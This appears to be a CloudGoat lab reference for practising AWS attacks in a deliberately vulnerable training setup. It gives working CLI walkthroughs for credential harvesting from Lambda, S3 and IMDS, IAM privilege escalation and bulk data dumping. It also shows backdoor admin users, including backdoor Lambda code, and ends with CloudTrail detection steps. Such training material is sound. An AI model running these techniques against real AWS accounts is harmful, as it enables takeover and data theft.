CloudGoat
CloudGoat is Rhino Security Labs' "vulnerable by design" AWS deployment tool. It uses Terraform to build intentionally vulnerable AWS environments and provides hands-on, CTF-style scenarios covering IAM misconfigurations, Lambda exploitation, S3 exposure, and broader AWS service abuse.
Installation and Setup
Prerequisites
# System requirements
- Python 3.6+
- AWS CLI v2
- Terraform
- Git
- AWS Account with API access
# Install pip packages
pip install boto3 botocore
# Configure AWS credentials
aws configure
# Or set environment variables:
export AWS_ACCESS_KEY_ID="AKIAIOSFODNN7EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
Install CloudGoat
# Clone repository
git clone https://github.com/rhinosecuritylabs/cloudgoat.git
cd cloudgoat
# Install Python dependencies
pip install -r requirements.txt
# Configure AWS profile
export AWS_PROFILE=default
# Display help
python3 cloudgoat.py help
# List all available scenarios
python3 cloudgoat.py list all
Create and Destroy Scenarios
# Create a scenario
python3 cloudgoat.py create iam_privesc_by_rollback
# Create using a specific AWS CLI profile
python3 cloudgoat.py create iam_privesc_by_rollback --profile my-test
# Destroy a scenario (cleanup)
python3 cloudgoat.py destroy iam_privesc_by_rollback
# Destroy all deployed scenarios
python3 cloudgoat.py destroy all
# List deployed scenario instances
python3 cloudgoat.py list deployed
# Show details for a specific scenario
python3 cloudgoat.py list iam_privesc_by_rollback
Example Attack Walkthroughs
Lambda IDOR (Insecure Direct Object Reference) to Credential Exposure
# Objective: Exploit IDOR vulnerability in Lambda to escalate privileges
# 1. Enumerate initial access
aws iam get-user
# 2. List Lambda functions
aws lambda list-functions
# 3. Invoke vulnerable Lambda (AWS CLI v2 needs --cli-binary-format for a JSON payload)
aws lambda invoke --function-name vulnerable_function \
--cli-binary-format raw-in-base64-out \
--payload '{"user_id":"1"}' response.json
# 4. Change payload to enumerate other users
aws lambda invoke --function-name vulnerable_function \
--cli-binary-format raw-in-base64-out \
--payload '{"user_id":"2"}' response.json
# 5. Extract credentials from Lambda environment
aws lambda get-function --function-name vulnerable_function
# 6. Use exposed credentials
export AWS_ACCESS_KEY_ID="exposed_key"
export AWS_SECRET_ACCESS_KEY="exposed_secret"
aws iam get-user
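Steps 3-6 are easy to script. The sketch below is a minimal example: the function name and `user_id` payload field are taken from the walkthrough above (assumptions, not fixed CloudGoat names), and the key-extraction regex is a heuristic matching the documented `AKIA`/`ASIA` key-ID shape.

```python
import json
import re

# Access key IDs are 20 chars: a 4-char prefix (AKIA = long-term, ASIA = temporary)
# followed by 16 uppercase alphanumerics.
KEY_ID_RE = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

def find_access_key_ids(text: str) -> list:
    """Return any access-key-ID-shaped strings found in a response body."""
    return KEY_ID_RE.findall(text)

def enumerate_users(function_name: str, max_id: int = 10) -> dict:
    """Invoke the (assumed) vulnerable Lambda across a range of user_ids,
    collecting any leaked key IDs per user. Requires AWS credentials."""
    import boto3  # imported lazily so the pure helper is testable offline
    lam = boto3.client("lambda")
    leaks = {}
    for uid in range(1, max_id + 1):
        resp = lam.invoke(FunctionName=function_name,
                          Payload=json.dumps({"user_id": str(uid)}))
        body = resp["Payload"].read().decode()
        hits = find_access_key_ids(body)
        if hits:
            leaks[uid] = hits
    return leaks
```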
Public ECR Repository Access
# Objective: Pull and exploit container images from ECR
# 1. Enumerate ECR repositories
aws ecr describe-repositories
# 2. Authenticate Docker to the registry
aws ecr get-login-password | docker login --username AWS \
--password-stdin <account-id>.dkr.ecr.<region>.amazonaws.com
# 3. List images in repository
aws ecr list-images --repository-name vulnerable-app
# 4. Get image URI
aws ecr describe-images --repository-name vulnerable-app
# 5. Pull container image locally
docker pull <account-id>.dkr.ecr.<region>.amazonaws.com/vulnerable-app:latest
# 6. Extract secrets from image layers
docker inspect <image-id>
docker history <image-id> --no-trunc
# 7. Export the image and search it for hardcoded credentials
docker save <image-id> -o image.tar
strings image.tar | grep -iE "key|secret|password"
Misconfigured S3 Bucket Exposure
# Objective: Access sensitive files in misconfigured S3 bucket
# 1. List accessible S3 buckets
aws s3 ls
# 2. Check bucket permissions
aws s3api get-bucket-acl --bucket vulnerable-bucket
# 3. List bucket contents
aws s3 ls s3://vulnerable-bucket/ --recursive
# 4. Download sensitive files
aws s3 cp s3://vulnerable-bucket/secrets.txt .
# 5. Check bucket policy
aws s3api get-bucket-policy --bucket vulnerable-bucket
# 6. Extract credentials from files
grep -i key secrets.txt
IAM Privilege Escalation Techniques
Assume Role Exploitation
# 1. List available IAM roles
aws iam list-roles
# 2. Check trust relationships
aws iam get-role --role-name vulnerable-role
# 3. Check if current user can assume role
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/vulnerable-role \
--role-session-name exploitation
# 4. Use assumed role credentials
export AWS_ACCESS_KEY_ID="assumed_key"
export AWS_SECRET_ACCESS_KEY="assumed_secret"
export AWS_SESSION_TOKEN="session_token"
# 5. List resources accessible to assumed role
aws s3 ls
aws ec2 describe-instances
# 6. Enumerate further targets (list-access-keys returns key IDs only; secret keys are never retrievable via IAM)
aws iam list-users
aws iam list-access-keys --user-name admin
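The assume-then-export flow above condenses to a few lines of boto3. `creds_to_env` only formats the temporary credentials as paste-ready export lines; the role ARN is whatever the earlier enumeration turned up.

```python
def creds_to_env(creds: dict) -> str:
    """Format STS credentials as shell export lines."""
    return "\n".join([
        f'export AWS_ACCESS_KEY_ID="{creds["AccessKeyId"]}"',
        f'export AWS_SECRET_ACCESS_KEY="{creds["SecretAccessKey"]}"',
        f'export AWS_SESSION_TOKEN="{creds["SessionToken"]}"',
    ])

def assume(role_arn: str, session_name: str = "exploitation") -> str:
    """Call sts:AssumeRole and return ready-to-paste export lines."""
    import boto3  # lazy import: the formatter above is testable offline
    sts = boto3.client("sts")
    resp = sts.assume_role(RoleArn=role_arn, RoleSessionName=session_name)
    return creds_to_env(resp["Credentials"])
```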
Policy Attachment Abuse
# 1. Check user inline policies
aws iam list-user-policies --user-name current-user
# 2. Get policy details
aws iam get-user-policy --user-name current-user --policy-name vulnerable-policy
# 3. Check managed policies
aws iam list-attached-user-policies --user-name current-user
# 4. If policy allows, create new IAM user
aws iam create-user --user-name backdoor
# 5. Create access keys for backdoor user
aws iam create-access-key --user-name backdoor
# 6. Attach admin policy
aws iam attach-user-policy --user-name backdoor \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# 7. Use backdoor credentials
export AWS_ACCESS_KEY_ID="backdoor_key"
export AWS_SECRET_ACCESS_KEY="backdoor_secret"
STS Token Exploitation
# 1. Get security token service information
aws sts get-caller-identity
# 2. If STS permissions allow, create tokens
aws sts get-session-token --duration-seconds 3600
# 3. Use temporary credentials
export AWS_ACCESS_KEY_ID="temp_key"
export AWS_SECRET_ACCESS_KEY="temp_secret"
export AWS_SESSION_TOKEN="temp_token"
# 4. Access resources with temporary credentials
aws ec2 describe-instances
aws s3 ls
Lambda and Serverless Exploitation
Lambda Environment Variable Extraction
# 1. List Lambda functions
aws lambda list-functions
# 2. Get function configuration
aws lambda get-function-configuration --function-name vulnerable-function
# 3. Extract environment variables
aws lambda get-function --function-name vulnerable-function | grep -A5 Environment
# 4. Look for credentials in environment
# Common variable names: DB_PASSWORD, API_KEY, SECRET, AWS_SECRET_ACCESS_KEY
# 5. If accessible, invoke function and observe errors
aws lambda invoke --function-name vulnerable-function \
--cli-binary-format raw-in-base64-out \
--payload '{"test":"payload"}' response.json
# 6. Extract credentials from CloudWatch logs
aws logs describe-log-groups
aws logs describe-log-streams --log-group-name /aws/lambda/vulnerable-function
aws logs get-log-events --log-group-name /aws/lambda/vulnerable-function \
--log-stream-name 'log-stream-name'
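Rather than eyeballing each function (step 4), a short boto3 sweep can flag secret-looking environment variable names across every Lambda in the region. The name patterns are a heuristic, not an exhaustive list.

```python
import re

# Heuristic: variable names that commonly carry credentials
SECRET_NAME_RE = re.compile(r"(?i)(secret|passw|token|api_?key|access_?key)")

def suspicious_env_keys(env: dict) -> list:
    """Return environment variable names that look credential-bearing."""
    return sorted(k for k in env if SECRET_NAME_RE.search(k))

def sweep_functions() -> dict:
    """Map each Lambda to its suspicious env var names. Requires AWS credentials."""
    import boto3  # lazy import keeps the helper above testable offline
    lam = boto3.client("lambda")
    findings = {}
    for page in lam.get_paginator("list_functions").paginate():
        for fn in page["Functions"]:
            env = fn.get("Environment", {}).get("Variables", {})
            hits = suspicious_env_keys(env)
            if hits:
                findings[fn["FunctionName"]] = hits
    return findings
```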
Lambda Layer Exploitation
# 1. List Lambda layers
aws lambda list-layers
# 2. Get layer version details
aws lambda get-layer-version --layer-name vulnerable-layer --version-number 1
# 3. Download layer archive
aws lambda get-layer-version --layer-name vulnerable-layer --version-number 1 \
--query 'Content.Location' --output text | xargs curl -o layer.zip
# 4. Extract and analyze
unzip layer.zip
find . -name "*.py" -o -name "*.sh" -o -name "*.conf"
# 5. Search for hardcoded secrets
grep -r "key\|password\|secret\|token" --include="*.py" --include="*.sh"
Lambda Role Assumption
# 1. Get Lambda execution role ARN
aws lambda get-function-configuration --function-name vulnerable-function \
| grep Role
# 2. List policies attached to role
aws iam list-attached-role-policies --role-name lambda-execution-role
# 3. Get inline policies
aws iam list-role-policies --role-name lambda-execution-role
# 4. Check if role can be assumed from outside
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/lambda-execution-role \
--role-session-name exploitation
# 5. If successful, use assumed role to access other resources
export AWS_ACCESS_KEY_ID="key"
export AWS_SECRET_ACCESS_KEY="secret"
aws s3 ls
aws dynamodb list-tables
Data Exfiltration Techniques
S3 Bucket Data Extraction
# 1. Identify accessible buckets
aws s3 ls
# 2. Check bucket versioning (retrieve deleted objects)
aws s3api get-bucket-versioning --bucket vulnerable-bucket
# 3. List all versions including deleted
aws s3api list-object-versions --bucket vulnerable-bucket
# 4. Download specific file version
aws s3api get-object --bucket vulnerable-bucket --key secretfile.txt \
--version-id version-id secretfile.txt
# 5. Download entire bucket (sync is recursive by default; it takes no --recursive flag)
aws s3 sync s3://vulnerable-bucket ./downloaded_data
# 6. Compress and exfiltrate
tar -czf exfil.tar.gz ./downloaded_data
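Steps 2-4 (recovering soft-deleted objects from a versioned bucket) are tedious by hand. A rough boto3 sketch: `deleted_keys` is the pure decision logic (keys whose newest version is a delete marker), and `recover_all` downloads the most recent surviving version of each. It assumes the bucket fits in a single ListObjectVersions page.

```python
def deleted_keys(listing: dict) -> list:
    """Keys whose newest version is a delete marker, i.e. objects that
    look deleted but still have retrievable versions underneath."""
    return sorted(m["Key"] for m in listing.get("DeleteMarkers", [])
                  if m.get("IsLatest"))

def recover_all(bucket: str, dest: str = "."):
    """Download the newest real version of every soft-deleted object."""
    import boto3, os  # lazy import: deleted_keys stays testable offline
    s3 = boto3.client("s3")
    listing = s3.list_object_versions(Bucket=bucket)
    gone = set(deleted_keys(listing))
    # Versions are returned newest-first per key, so the first match wins
    for v in listing.get("Versions", []):
        if v["Key"] in gone:
            s3.download_file(bucket, v["Key"],
                             os.path.join(dest, os.path.basename(v["Key"])),
                             ExtraArgs={"VersionId": v["VersionId"]})
            gone.discard(v["Key"])
```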
RDS Database Access
# 1. List RDS instances
aws rds describe-db-instances
# 2. Get DB endpoint and port
aws rds describe-db-instances --db-instance-identifier vulnerable-db \
| grep -E "Endpoint|Port"
# 3. Get DB credentials from Secrets Manager
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id rds-credentials
# 4. Connect to RDS
mysql -h endpoint -u user -ppassword -D database
# 5. Dump database
mysqldump -h endpoint -u user -ppassword database > database_dump.sql
DynamoDB Exploitation
# 1. List DynamoDB tables
aws dynamodb list-tables
# 2. Get table schema
aws dynamodb describe-table --table-name vulnerable-table
# 3. Scan table for all items
aws dynamodb scan --table-name vulnerable-table
# 4. Export to JSON
aws dynamodb scan --table-name vulnerable-table > table_dump.json
# 5. If large table, use pagination
aws dynamodb scan --table-name vulnerable-table --max-items 100 \
--starting-token token
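boto3 paginators handle the `--starting-token` bookkeeping from step 5 automatically. A minimal sketch, with `merge_pages` isolating the page-flattening logic so it can be checked offline:

```python
def merge_pages(pages) -> list:
    """Flatten the Items lists from a sequence of Scan result pages."""
    items = []
    for page in pages:
        items.extend(page.get("Items", []))
    return items

def dump_table(table_name: str) -> list:
    """Scan an entire DynamoDB table, transparently following pagination."""
    import boto3  # lazy import: merge_pages stays testable offline
    ddb = boto3.client("dynamodb")
    return merge_pages(ddb.get_paginator("scan").paginate(TableName=table_name))
```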
EC2 and Compute Exploitation
EC2 Instance Metadata Service (IMDS) Exploitation
# 1. From compromised EC2 instance, access IMDS
curl http://169.254.169.254/latest/meta-data/
# 2. Get IAM role name
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# 3. Get IAM role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
# 4. Extract access key, secret key, and token
# Use these credentials for further exploitation
# 5. IMDSv2 requires a session token: mint it with a PUT, then send it on each request
TOKEN=$(curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
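The same IMDSv2 dance in stdlib Python, useful when curl is unavailable on the box. Request construction is separated from the network calls; `get_role_credentials` only works from inside an EC2 instance.

```python
import urllib.request

BASE = "http://169.254.169.254"  # link-local IMDS endpoint

def token_request(ttl: int = 21600) -> urllib.request.Request:
    """Build the IMDSv2 PUT request that mints a session token."""
    return urllib.request.Request(
        f"{BASE}/latest/api/token", method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)})

def metadata_request(path: str, token: str) -> urllib.request.Request:
    """Build a metadata GET carrying the session token."""
    return urllib.request.Request(
        f"{BASE}/latest/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token})

def get_role_credentials() -> str:
    """Fetch the instance role's temporary credentials (EC2 only)."""
    fetch = lambda req: urllib.request.urlopen(req, timeout=2).read().decode()
    token = fetch(token_request())
    role = fetch(metadata_request("iam/security-credentials/", token)).strip()
    return fetch(metadata_request(f"iam/security-credentials/{role}", token))
```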
EC2 Security Group Abuse
# 1. List EC2 instances
aws ec2 describe-instances
# 2. Get security group IDs
aws ec2 describe-security-groups
# 3. If permissions allow, modify security groups
aws ec2 authorize-security-group-ingress --group-id sg-xxxxxxxx \
--protocol tcp --port 22 --cidr 0.0.0.0/0
# 4. Now can SSH into instances
ssh -i key.pem ubuntu@ec2-instance.compute.amazonaws.com
# 5. Once inside, check for IAM role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
EC2 AMI and Snapshot Extraction
# 1. List available AMIs
aws ec2 describe-images --owners self
# 2. List snapshots
aws ec2 describe-snapshots --owner-ids self
# 3. Create volume from snapshot
aws ec2 create-volume --snapshot-id snap-xxxxxxxx --availability-zone us-east-1a
# 4. Attach to instance
aws ec2 attach-volume --volume-id vol-xxxxxxxx --instance-id i-xxxxxxxx --device /dev/sdf
# 5. Mount and access (if the volume is partitioned, mount the partition, e.g. /dev/nvme1n1p1)
sudo mkdir /mnt/snapshot
sudo mount /dev/nvme1n1 /mnt/snapshot
ls -la /mnt/snapshot
Persistence and Backdoors
IAM User Backdoor
# 1. Create new IAM user
aws iam create-user --user-name backdoor-admin
# 2. Create access keys
aws iam create-access-key --user-name backdoor-admin
# 3. Attach admin policy
aws iam attach-user-policy --user-name backdoor-admin \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# 4. Store credentials securely
# Save access key and secret key for later use
Lambda Persistence
# 1. Create Lambda function with backdoor code
cat > backdoor.py << 'EOF'
import boto3

def lambda_handler(event, context):
    # Create a new admin user on each invocation
    iam = boto3.client('iam')
    iam.create_user(UserName='pwned')
    iam.create_access_key(UserName='pwned')
    iam.attach_user_policy(
        UserName='pwned',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return {'statusCode': 200}
EOF
# 2. Create execution role
aws iam create-role --role-name lambda-backdoor-role \
--assume-role-policy-document '{...}'
# 3. Deploy function
zip backdoor.zip backdoor.py
aws lambda create-function --function-name backdoor \
--runtime python3.9 --role arn:aws:iam::123456789012:role/lambda-backdoor-role \
--handler backdoor.lambda_handler --zip-file fileb://backdoor.zip
# 4. Schedule periodic invocation (a rule alone does nothing: it also needs a target
# via events put-targets, plus lambda add-permission for events.amazonaws.com)
aws events put-rule --name daily-backdoor --schedule-expression "rate(1 day)"
EventBridge Scheduled Backdoor
# 1. Create SNS topic for exfiltration
aws sns create-topic --name backdoor-exfil
# 2. Create EventBridge rule
aws events put-rule --name exfil-schedule --schedule-expression "rate(1 hour)"
# 3. Add Lambda target
aws events put-targets --rule exfil-schedule \
--targets "Id"="1","Arn"="arn:aws:lambda:...:function:exfil"
Enumeration and Reconnaissance
AWS Account Information
# Get account ID
aws sts get-caller-identity
# Get current user/role
aws sts get-caller-identity | grep Arn
# Get account aliases
aws iam list-account-aliases
# Get account password policy
aws iam get-account-password-policy
# Get account summary
aws iam get-account-summary
IAM Enumeration
# List all users
aws iam list-users
# List all groups
aws iam list-groups
# List all roles
aws iam list-roles
# Get details on specific user
aws iam get-user --user-name username
# List user's groups
aws iam list-groups-for-user --user-name username
# List user's attached policies
aws iam list-attached-user-policies --user-name username
# List user's inline policies
aws iam list-user-policies --user-name username
# Get policy details
aws iam get-user-policy --user-name username --policy-name policy-name
Cross-Account Access Detection
# List trust relationships
aws iam get-role --role-name target-role | grep AssumeRolePolicyDocument
# Check for external account principals
aws iam get-role --role-name target-role | grep -i "Principal"
# List all roles with cross-account access
for role in $(aws iam list-roles --query 'Roles[].RoleName' --output text); do
aws iam get-role --role-name "$role" --query 'Role.AssumeRolePolicyDocument' | grep -q '"AWS"' && echo "Cross-account: $role"
done
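The loop above flags any role whose trust policy names an AWS principal, including same-account trusts. The sketch below actually parses the trust document and reports only principals whose embedded account ID differs from your own (boto3 returns `AssumeRolePolicyDocument` already decoded to a dict):

```python
import re

def external_principals(trust_doc: dict, own_account: str) -> list:
    """Return AWS principals in an assume-role policy document that
    belong to a different 12-digit account than own_account."""
    found = []
    for stmt in trust_doc.get("Statement", []):
        aws = stmt.get("Principal", {}).get("AWS", [])
        if isinstance(aws, str):
            aws = [aws]  # principal may be a single ARN or a list
        for p in aws:
            accts = re.findall(r"\d{12}", p)
            if accts and own_account not in accts:
                found.append(p)
    return found

def cross_account_roles(own_account: str) -> dict:
    """Map each role to its external principals. Requires AWS credentials."""
    import boto3  # lazy import: the parser above is testable offline
    iam = boto3.client("iam")
    hits = {}
    for page in iam.get_paginator("list_roles").paginate():
        for role in page["Roles"]:
            ext = external_principals(role["AssumeRolePolicyDocument"], own_account)
            if ext:
                hits[role["RoleName"]] = ext
    return hits
```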
Available Scenarios
| Scenario | Size | Objective |
|---|---|---|
| iam_privesc_by_rollback | Small | Escalate privileges by rolling an IAM policy back to a permissive version |
| lambda_privesc | Small | Abuse a Lambda execution role to gain admin access |
| vulnerable_lambda | Small | Inject into a Lambda to attach a privileged policy to your user |
| cloud_breach_s3 | Small | Steal S3 data via a misconfigured reverse proxy and the EC2 metadata service |
| iam_privesc_by_attachment | Medium | Escalate via instance-profile attachment abuse |
| ec2_ssrf | Medium | Chain SSRF, exposed credentials, and Lambda to reach admin |
| ecs_takeover | Medium | Pivot through containers and an ECS cluster to reach the flag |
| rce_web_app | Medium | RCE on a web app, then pivot through RDS and EC2 |
| codebuild_secrets | Medium | Harvest secrets from CodeBuild and pivot to RDS |
| detection_evasion | Large | Reach the flag while evading detection controls |
CloudGoat Exploitation Workflow
Step 1: Environment Setup
# Clone and setup
git clone https://github.com/rhinosecuritylabs/cloudgoat.git
cd cloudgoat
pip install -r requirements.txt
# Configure AWS
aws configure
export AWS_PROFILE=default
Step 2: Scenario Creation
# List available scenarios
python3 cloudgoat.py list all
# Create a specific scenario
python3 cloudgoat.py create iam_privesc_by_rollback --profile default
# Starting credentials appear in the scenario output and in the instance's start.txt
Step 3: Exploitation
# Set initial credentials
export AWS_ACCESS_KEY_ID="initial_key"
export AWS_SECRET_ACCESS_KEY="initial_secret"
# Enumerate
aws iam get-user
aws iam list-roles
aws lambda list-functions
# Exploit vulnerability
# (varies by scenario)
# Extract credentials
# (varies by scenario)
Step 4: Privilege Escalation
# Use new credentials
export AWS_ACCESS_KEY_ID="escalated_key"
export AWS_SECRET_ACCESS_KEY="escalated_secret"
# Repeat enumeration
aws iam list-users
aws s3 ls
# Continue escalation chain
Step 5: Cleanup
# Destroy scenario when done
python3 cloudgoat.py destroy iam_privesc_by_rollback
# Verify nothing is left deployed (CloudGoat provisions with Terraform, not CloudFormation)
python3 cloudgoat.py list deployed
Detection and Logging
CloudTrail Monitoring
# Enable CloudTrail (create-trail alone does not record events; start logging too)
aws cloudtrail create-trail --name cloudtrail-monitoring --s3-bucket-name trail-bucket
aws cloudtrail start-logging --name cloudtrail-monitoring
# View CloudTrail events
aws cloudtrail lookup-events --lookup-attributes AttributeKey=ResourceName,AttributeValue=vulnerable-role
# Find suspicious activity
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=CreateAccessKey
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AttachUserPolicy
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole
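The three lookups above can run as one pass with a paginator; the event-name watchlist mirrors the commands and is easy to extend. `summarize` is plain counting logic:

```python
# Watchlist of CloudTrail event names tied to the techniques in this guide
SUSPICIOUS = ["CreateAccessKey", "AttachUserPolicy", "AssumeRole",
              "CreateUser", "PutUserPolicy"]

def summarize(events) -> dict:
    """Count occurrences per event name from CloudTrail event dicts."""
    counts = {}
    for e in events:
        name = e.get("EventName")
        counts[name] = counts.get(name, 0) + 1
    return counts

def hunt() -> dict:
    """Run lookup-events for each watched event name. Requires AWS credentials."""
    import boto3  # lazy import: summarize stays testable offline
    ct = boto3.client("cloudtrail")
    events = []
    for name in SUSPICIOUS:
        for page in ct.get_paginator("lookup_events").paginate(
                LookupAttributes=[{"AttributeKey": "EventName",
                                   "AttributeValue": name}]):
            events.extend(page["Events"])
    return summarize(events)
```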
CloudWatch Log Analysis
# Create metric filter for suspicious activity
aws logs put-metric-filter --log-group-name /aws/lambda/logs \
--filter-name UnauthorizedAPICalls \
--filter-pattern '{ ($.errorCode = "*UnauthorizedOperation") || ($.errorCode = "AccessDenied*") }' \
--metric-transformations metricName=UnauthorizedAPICalls,metricNamespace=Security,metricValue=1
# View log streams
aws logs describe-log-streams --log-group-name /aws/lambda/logs
# Get specific logs
aws logs get-log-events --log-group-name /aws/lambda/logs \
--log-stream-name log-stream-name
Best Practices for CloudGoat
- Use separate AWS accounts for testing
- Enable CloudTrail and CloudWatch logging before scenarios
- Document all findings in each scenario
- Practice both attack and defense perspectives
- Review AWS security best practices after each scenario
- Compare exploits across different tools
- Test remediation measures
- Keep credentials secure and rotate regularly
- Destroy scenarios immediately after completion
- Use least privilege for CloudGoat execution role